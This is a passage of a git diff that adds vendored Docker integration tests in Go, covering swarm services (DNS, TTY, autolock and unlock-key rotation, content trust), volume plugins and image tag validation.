d.Cmd("network", "create", "-d", globalNetworkPlugin, "foo") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "not supported in swarm mode") +} + +// Test case for #24712 +func (s *DockerSwarmSuite) TestSwarmServiceEnvFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + path := filepath.Join(d.folder, "env.txt") + err := ioutil.WriteFile(path, []byte("VAR1=A\nVAR2=A\n"), 0644) + c.Assert(err, checker.IsNil) + + name := "worker" + out, err := d.Cmd("service", "create", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // The complete env is [VAR1=A VAR2=A VAR1=B VAR1=C VAR2= VAR2] and duplicates will be removed => [VAR1=C VAR2] + out, err = d.Cmd("inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.Env }}", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "[VAR1=C VAR2]") +} + +func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "top" + + ttyCheck := "if [ -t 0 ]; then echo TTY > /status && top; else echo none > /status && top; fi" + + // Without --tty + expectedOutput := "none" + out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", ttyCheck) + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + out, err = d.Cmd("exec", id, "cat", "/status") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) + + // Remove service + out, err = d.Cmd("service", "rm", name) + c.Assert(err, checker.IsNil) + // Make sure container has been destroyed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + + // With --tty + expectedOutput = "TTY" + out, err = d.Cmd("service", "create", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck) + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id = strings.TrimSpace(out) + + out, err = d.Cmd("exec", id, "cat", "/status") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "false") + + _, err = d.Cmd("service", "update", "--tty", name) + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") +} + +func (s *DockerSwarmSuite) TestDNSConfig(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + // Compare against expected output. + expectedOutput1 := "nameserver 1.2.3.4" + expectedOutput2 := "search example.com" + expectedOutput3 := "options timeout:3" + out, err = d.Cmd("exec", id, "cat", "/etc/resolv.conf") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out)) + c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out)) + c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out)) +} + +func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + _, err = d.Cmd("service", "update", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name) + c.Assert(err, checker.IsNil) + + out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.DNSConfig }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "{[1.2.3.4] [example.com] [timeout:3]}") +} + +func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { + d := s.AddDaemon(c, false, false) + + outs, err := d.Cmd("swarm", "init", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + c.Assert(d.Restart(), checker.IsNil) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + + cmd := d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString("wrong-secret-key") + out, err := cmd.CombinedOutput() + c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out))) + c.Assert(string(out), checker.Contains, "invalid key") + + cmd = d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + out, err = cmd.CombinedOutput() + c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") + + outs, err = d.Cmd("swarm", "update", "--autolock=false") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + // Wait for autolock to be turned off + time.Sleep(time.Second) + + c.Assert(d.Restart(), checker.IsNil) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") +} + +func (s *DockerSwarmSuite) TestSwarmLeaveLocked(c *check.C) { + d := s.AddDaemon(c, false, false) + + outs, err := d.Cmd("swarm", "init", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(d.Restart("--swarm-default-advertise-addr=lo"), checker.IsNil) + + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + + outs, _ = d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + outs, err = d.Cmd("swarm", "leave", "--force") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + outs, err = d.Cmd("swarm", "init") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) +} + +func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { + d := s.AddDaemon(c, true, true) + + outs, err := d.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + // Rotate multiple times + for i := 0; i != 3; i++ { + outs, err = d.Cmd("swarm", "unlock-key", "-q", "--rotate") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + // Strip \n + newUnlockKey := outs[:len(outs)-1] + c.Assert(newUnlockKey, checker.Not(checker.Equals), "") + c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey) + + c.Assert(d.Restart(), checker.IsNil) + + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + + outs, _ = d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + cmd := d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + out, err := cmd.CombinedOutput() + + if err == nil { + // On occasion, the daemon may not have finished + // rotating the KEK before restarting. The test is + // intentionally written to explore this behavior. + // When this happens, unlocking with the old key will + // succeed. If we wait for the rotation to happen and + // restart again, the new key should be required this + // time. + + time.Sleep(3 * time.Second) + + c.Assert(d.Restart(), checker.IsNil) + + cmd = d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + out, err = cmd.CombinedOutput() + } + c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out))) + c.Assert(string(out), checker.Contains, "invalid key") + + outs, _ = d.Cmd("node", "ls") + c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + + cmd = d.command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(newUnlockKey) + out, err = cmd.CombinedOutput() + c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + + info, err = d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + outs, err = d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked") + + unlockKey = newUnlockKey + } +} + +func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a service + name := "top" + _, err := d.Cmd("service", "create", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top") + c.Assert(err, checker.IsNil) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + // We need to get the container id. + out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + // Compare against expected output. + expectedOutput := "1.2.3.4\texample.com" + out, err = d.Cmd("exec", id, "cat", "/etc/hosts") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) +} + +func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + // Manager Addresses will always show Node 1's address + expectedOutput := fmt.Sprintf("Manager Addresses:\n 127.0.0.1:%d\n", d1.port) + + out, err := d1.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, err = d2.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) + + out, err = d3.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, expectedOutput) +} + +func (s *DockerSwarmSuite) TestSwarmServiceInspectPretty(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "top" + out, err := d.Cmd("service", "create", "--name", name, "--limit-cpu=0.5", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + expectedOutput := ` +Resources: + Limits: + CPU: 0.5` + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") + + out, err = d.Cmd("service", "create", "--network=foo", "--name", "top", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]") +} + +// TODO: migrate to a unit test +// This test could be migrated to unit test and save costly integration test, +// once PR #29143 is merged. +func (s *DockerSwarmSuite) TestSwarmUpdateWithoutArgs(c *check.C) { + d := s.AddDaemon(c, true, true) + + expectedOutput := ` +Usage: docker swarm update [OPTIONS] + +Update the swarm + +Options:` + + out, err := d.Cmd("swarm", "update") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out)) +} + +func (s *DockerTrustedSwarmSuite) TestTrustedServiceCreate(c *check.C) { + d := s.swarmSuite.AddDaemon(c, true, true) + + // Attempt creating a service from an image that is known to notary. + repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") + + name := "trusted" + serviceCmd := d.command("-D", "service", "create", "--name", name, repoName, "top") + s.trustSuite.trustedCmd(serviceCmd) + out, _, err := runCommandWithOutput(serviceCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) + + // Try trusted service create on an untrusted tag. + + repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + name = "untrusted" + serviceCmd = d.command("service", "create", "--name", name, repoName, "top") + s.trustSuite.trustedCmd(serviceCmd) + out, _, err = runCommandWithOutput(serviceCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.NotNil, check.Commentf(out)) +} + +func (s *DockerTrustedSwarmSuite) TestTrustedServiceUpdate(c *check.C) { + d := s.swarmSuite.AddDaemon(c, true, true) + + // Attempt creating a service from an image that is known to notary. + repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull") + + name := "myservice" + + // Create a service without content trust + _, err := d.Cmd("service", "create", "--name", name, repoName, "top") + c.Assert(err, checker.IsNil) + + out, err := d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Daemon won't insert the digest because this is disabled by + // DOCKER_SERVICE_PREFER_OFFLINE_IMAGE. + c.Assert(out, check.Not(checker.Contains), repoName+"@", check.Commentf(out)) + + serviceCmd := d.command("-D", "service", "update", "--image", repoName, name) + s.trustSuite.trustedCmd(serviceCmd) + out, _, err = runCommandWithOutput(serviceCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--pretty", name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out)) + + // Try trusted service update on an untrusted tag. + + repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + serviceCmd = d.command("service", "update", "--image", repoName, name) + s.trustSuite.trustedCmd(serviceCmd) + out, _, err = runCommandWithOutput(serviceCmd) + + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) +} + +// Test case for issue #27866, which did not allow NW name that is the prefix of a swarm NW ID. +// e.g. if the ingress ID starts with "n1", it was impossible to create a NW named "n1". +func (s *DockerSwarmSuite) TestSwarmNetworkCreateIssue27866(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("network", "inspect", "-f", "{{.Id}}", "ingress") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + ingressID := strings.TrimSpace(out) + c.Assert(ingressID, checker.Not(checker.Equals), "") + + // create a network of which name is the prefix of the ID of an overlay network + // (ingressID in this case) + newNetName := ingressID[0:2] + out, err = d.Cmd("network", "create", "--driver", "overlay", newNetName) + // In #27866, it was failing because of "network with name %s already exists" + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + out, err = d.Cmd("network", "rm", newNetName) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) +} + +// Test case for https://github.com/docker/docker/pull/27938#issuecomment-265768303 +// This test creates two networks with the same name sequentially, with various drivers. +// Since the operations in this test are done sequentially, the 2nd call should fail with +// "network with name FOO already exists". +// Note that it is to ok have multiple networks with the same name if the operations are done +// in parallel. (#18864) +func (s *DockerSwarmSuite) TestSwarmNetworkCreateDup(c *check.C) { + d := s.AddDaemon(c, true, true) + drivers := []string{"bridge", "overlay"} + for i, driver1 := range drivers { + nwName := fmt.Sprintf("network-test-%d", i) + for _, driver2 := range drivers { + c.Logf("Creating a network named %q with %q, then %q", + nwName, driver1, driver2) + out, err := d.Cmd("network", "create", "--driver", driver1, nwName) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + out, err = d.Cmd("network", "create", "--driver", driver2, nwName) + c.Assert(out, checker.Contains, + fmt.Sprintf("network with name %s already exists", nwName)) + c.Assert(err, checker.NotNil) + c.Logf("As expected, the attempt to network %q with %q failed: %s", + nwName, driver2, out) + out, err = d.Cmd("network", "rm", nwName) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go new file mode 100644 index 0000000000..d9e56ce6df --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go @@ -0,0 +1,52 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Make sure task stays pending before plugin is available + waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceTasksInState("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1) + + plugin := newVolumePlugin(c, "customvolumedriver") + defer plugin.Close() + + // create a dummy volume to trigger lazy loading of the plugin + out, err = d.Cmd("volume", "create", "-d", "customvolumedriver", "hello") + + // TODO(aaronl): It will take about 15 seconds for swarm to realize the + // plugin was loaded. Switching the test over to plugin v2 would avoid + // this long delay. + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + containerID := strings.TrimSpace(out) + + out, err = d.Cmd("inspect", "-f", "{{json .Mounts}}", containerID) + c.Assert(err, checker.IsNil) + + var mounts []struct { + Name string + Driver string + } + + c.Assert(json.NewDecoder(strings.NewReader(out)).Decode(&mounts), checker.IsNil) + c.Assert(len(mounts), checker.Equals, 1, check.Commentf(out)) + c.Assert(mounts[0].Name, checker.Equals, "my-volume") + c.Assert(mounts[0].Driver, checker.Equals, "customvolumedriver") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go new file mode 100644 index 0000000000..b7d2b1dfe6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go @@ -0,0 +1,225 @@ +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +// tagging a named image in a new unprefixed repo should work +func (s *DockerSuite) TestTagUnprefixedRepoByName(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + dockerCmd(c, "tag", "busybox:latest", "testfoobarbaz") +} + +// tagging an image by ID in a new unprefixed repo should work +func (s *DockerSuite) TestTagUnprefixedRepoByID(c *check.C) { + imageID := inspectField(c, "busybox", "Id") + dockerCmd(c, "tag", imageID, "testfoobarbaz") +} + +// ensure we don't allow the use of invalid repository names; these tag operations should fail +func (s *DockerSuite) TestTagInvalidUnprefixedRepo(c *check.C) { + invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"} + + for _, repo := range invalidRepos { + out, _, err := dockerCmdWithError("tag", "busybox", repo) + c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repo, out)) + } +} + +// ensure we don't allow the use of invalid tags; these tag operations should fail +func (s *DockerSuite) TestTagInvalidPrefixedRepo(c *check.C) { + longTag := stringutils.GenerateRandomAlphaOnlyString(121) + + invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag} + + for _, repotag := range invalidTags { + out, _, err := dockerCmdWithError("tag", "busybox", repotag) + c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repotag, out)) + } +} + +// ensure we allow the use of valid tags +func (s *DockerSuite) TestTagValidPrefixedRepo(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"} + + for _, repo := range validRepos { + _, _, err := dockerCmdWithError("tag", "busybox:latest", repo) + if err != nil { + c.Errorf("tag busybox %v should have worked: %s", repo, err) + continue + } + deleteImages(repo) + } +} + +// tag an image with an existed tag name without -f option should work +func (s *DockerSuite) TestTagExistedNameWithoutForce(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + dockerCmd(c, "tag", "busybox:latest", "busybox:test") +} + +func (s *DockerSuite) TestTagWithPrefixHyphen(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + // test repository name begin with '-' + out, _, err := dockerCmdWithError("tag", "busybox:latest", "-busybox:test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) + + // test namespace name begin with '-' + out, _, err = dockerCmdWithError("tag", "busybox:latest", "-test/busybox:test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) + + // test index name begin with '-' + out, _, err = dockerCmdWithError("tag", "busybox:latest", "-index:5000/busybox:test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) +} + +// ensure tagging using official names works +// ensure all tags result in the same name +func (s *DockerSuite) TestTagOfficialNames(c *check.C) { + names := []string{ + "docker.io/busybox", + "index.docker.io/busybox", + "library/busybox", + "docker.io/library/busybox", + "index.docker.io/library/busybox", + } + + for _, name := range names { + out, exitCode, err := dockerCmdWithError("tag", "busybox:latest", name+":latest") + if err != nil || exitCode != 0 { + c.Errorf("tag busybox %v should have worked: %s, %s", name, err, out) + continue + } + + // ensure we don't have multiple tag names. + out, _, err = dockerCmdWithError("images") + if err != nil { + c.Errorf("listing images failed with errors: %v, %s", err, out) + } else if strings.Contains(out, name) { + c.Errorf("images should not have listed '%s'", name) + deleteImages(name + ":latest") + } + } + + for _, name := range names { + _, exitCode, err := dockerCmdWithError("tag", name+":latest", "fooo/bar:latest") + if err != nil || exitCode != 0 { + c.Errorf("tag %v fooo/bar should have worked: %s", name, err) + continue + } + deleteImages("fooo/bar:latest") + } +} + +// ensure tags can not match digests +func (s *DockerSuite) TestTagMatchesDigest(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507" + // test setting tag fails + _, _, err := dockerCmdWithError("tag", "busybox:latest", digest) + if err == nil { + c.Fatal("digest tag a name should have failed") + } + // check that no new image matches the digest + _, _, err = dockerCmdWithError("inspect", digest) + if err == nil { + c.Fatal("inspecting by digest should have failed") + } +} + +func (s *DockerSuite) TestTagInvalidRepoName(c *check.C) { + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + + // test setting tag fails + _, _, err := dockerCmdWithError("tag", "busybox:latest", "sha256:sometag") + if err == nil { + c.Fatal("tagging with image named \"sha256\" should have failed") + } +} + +// ensure tags cannot create ambiguity with image ids +func (s *DockerSuite) TestTagTruncationAmbiguity(c *check.C) { + //testRequires(c, DaemonIsLinux) + // Don't attempt to pull on Windows as not in hub. It's installed + // as an image through .ensure-frozen-images-windows + if daemonPlatform != "windows" { + if err := pullImageIfNotExist("busybox:latest"); err != nil { + c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") + } + } + imageID, err := buildImage("notbusybox:latest", + `FROM busybox + MAINTAINER dockerio`, + true) + if err != nil { + c.Fatal(err) + } + truncatedImageID := stringid.TruncateID(imageID) + truncatedTag := fmt.Sprintf("notbusybox:%s", truncatedImageID) + + id := inspectField(c, truncatedTag, "Id") + + // Ensure inspect by image id returns image for image id + c.Assert(id, checker.Equals, imageID) + c.Logf("Built image: %s", imageID) + + // test setting tag fails + _, _, err = dockerCmdWithError("tag", "busybox:latest", truncatedTag) + if err != nil { + c.Fatalf("Error tagging with an image id: %s", err) + } + + id = inspectField(c, truncatedTag, "Id") + + // Ensure id is imageID and not busybox:latest + c.Assert(id, checker.Not(checker.Equals), imageID) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go new file mode 100644 index 0000000000..caae29024a --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go @@ -0,0 +1,73 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestTopMultipleArgs(c 